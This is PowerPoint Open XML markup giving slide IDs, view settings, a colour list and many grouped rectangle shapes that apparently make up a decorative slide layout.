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1457" r:id="rId2"/>
    <p:sldId id="1394" r:id="rId3"/>
    <p:sldId id="1484" r:id="rId4"/>
    <p:sldId id="1485" r:id="rId5"/>
    <p:sldId id="1486" r:id="rId6"/>
    <p:sldId id="1487" r:id="rId7"/>
    <p:sldId id="1488" r:id="rId8"/>
    <p:sldId id="1489" r:id="rId9"/>
    <p:sldId id="1490" r:id="rId10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5">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="370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yz" initials="x" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="2" name="秦 莫天" initials="秦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FEFEF"/>
    <a:srgbClr val="A5A5A5"/>
    <a:srgbClr val="003366"/>
    <a:srgbClr val="3399FF"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="5F5F5F"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="6666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86026" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="1042" y="67"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2005"/>
        <p:guide pos="3701"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="321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1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6885" y="720725"/>
            <a:ext cx="640143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9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7A1ED033-5F5C-4572-AE4B-7CFF71C657D2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图片 112" descr="掌控者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3835" y="1240790"/>
            <a:ext cx="1740535" cy="621665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 102"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12193201" cy="30686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" name="AutoShape 103"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3759570" y="3113088"/>
            <a:ext cx="7823970" cy="83820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6" name="Rectangle 105"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10262610" y="1741488"/>
            <a:ext cx="711270" cy="8382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7" name="Rectangle 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9246510" y="1131888"/>
            <a:ext cx="1219320" cy="8382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8" name="Rectangle 107"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10770660" y="141288"/>
            <a:ext cx="1219320" cy="15240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9" name="Rectangle 108"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="750888"/>
            <a:ext cx="71127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" name="Rectangle 110"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8433630" y="2884488"/>
            <a:ext cx="71127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" name="Rectangle 114"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="508050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2" name="Rectangle 120"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="569016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3" name="Rectangle 124"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="599499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4" name="Rectangle 126"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="629982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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 211"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299820" y="1741488"/>
            <a:ext cx="1727370" cy="838200"/>
            <a:chOff x="2976" y="1440"/>
            <a:chExt cx="816" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 104"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="144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7" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976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8" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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9" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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0" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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1" name="Rectangle 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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2" name="Rectangle 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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3" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="144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4" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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5" name="Rectangle 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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6" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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7" name="Rectangle 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="144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8" name="Rectangle 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552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9" name="Rectangle 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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0" name="Rectangle 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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1" name="Rectangle 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 212"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4470840" y="1970088"/>
            <a:ext cx="1727370" cy="609600"/>
            <a:chOff x="2112" y="1584"/>
            <a:chExt cx="816" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 112"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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4" name="Rectangle 113"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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5" name="Rectangle 115"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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6" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="172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7" name="Rectangle 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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8" name="Rectangle 118"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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9" name="Rectangle 119"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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0" name="Rectangle 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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1" name="Rectangle 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="172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2" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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3" name="Rectangle 141"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256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4" name="Rectangle 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 143"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1016100" y="3570288"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 144"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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7" name="Rectangle 145"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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8" name="Rectangle 146"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2207"/>
              <a:ext cx="95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9" name="Rectangle 147"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545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0" name="Rectangle 148"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1920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1" name="Rectangle 149"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545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2" name="Rectangle 150"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="1776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3" name="Rectangle 151"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687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2687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5" name="Rectangle 153"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1776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6" name="Rectangle 154"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1920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7" name="Rectangle 155"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2065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8" name="Rectangle 156"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2207"/>
              <a:ext cx="98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9" name="Rectangle 157"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976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0" name="Rectangle 158"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976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1" name="Rectangle 159"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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2" name="Rectangle 160"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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3" name="Rectangle 161"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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4" name="Rectangle 162"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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5" name="Rectangle 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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6" name="Rectangle 164"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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7" name="Rectangle 165"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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8" name="Rectangle 166"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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9" name="Rectangle 167"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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0" name="Rectangle 168"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553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1" name="Rectangle 169"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553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2" name="Rectangle 170"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695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3" name="Rectangle 171"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695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4" name="Rectangle 172"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695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5" name="Rectangle 173"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256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6" name="Rectangle 174"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="77" name="Group 175"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315920" y="827088"/>
            <a:ext cx="3556350" cy="1066800"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Rectangle 176"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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9" name="Rectangle 177"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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0" name="Rectangle 178"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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1" name="Rectangle 179"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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2" name="Rectangle 180"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1920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3" name="Rectangle 181"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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4" name="Rectangle 182"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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5" name="Rectangle 183"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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6" name="Rectangle 184"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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7" name="Rectangle 185"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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8" name="Rectangle 186"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1920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9" name="Rectangle 187"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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0" name="Rectangle 188"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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1" name="Rectangle 189"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976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2" name="Rectangle 190"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976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3" name="Rectangle 191"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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4" name="Rectangle 192"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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5" name="Rectangle 193"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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6" name="Rectangle 194"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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7" name="Rectangle 195"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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8" name="Rectangle 196"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="16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9" name="Rectangle 197"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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0" name="Rectangle 198"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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1" name="Rectangle 199"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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2" name="Rectangle 200"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="16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3" name="Rectangle 201"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552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" name="Rectangle 202"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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" name="Rectangle 203"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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" name="Rectangle 204"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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7" name="Rectangle 205"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256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8" name="Rectangle 206"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
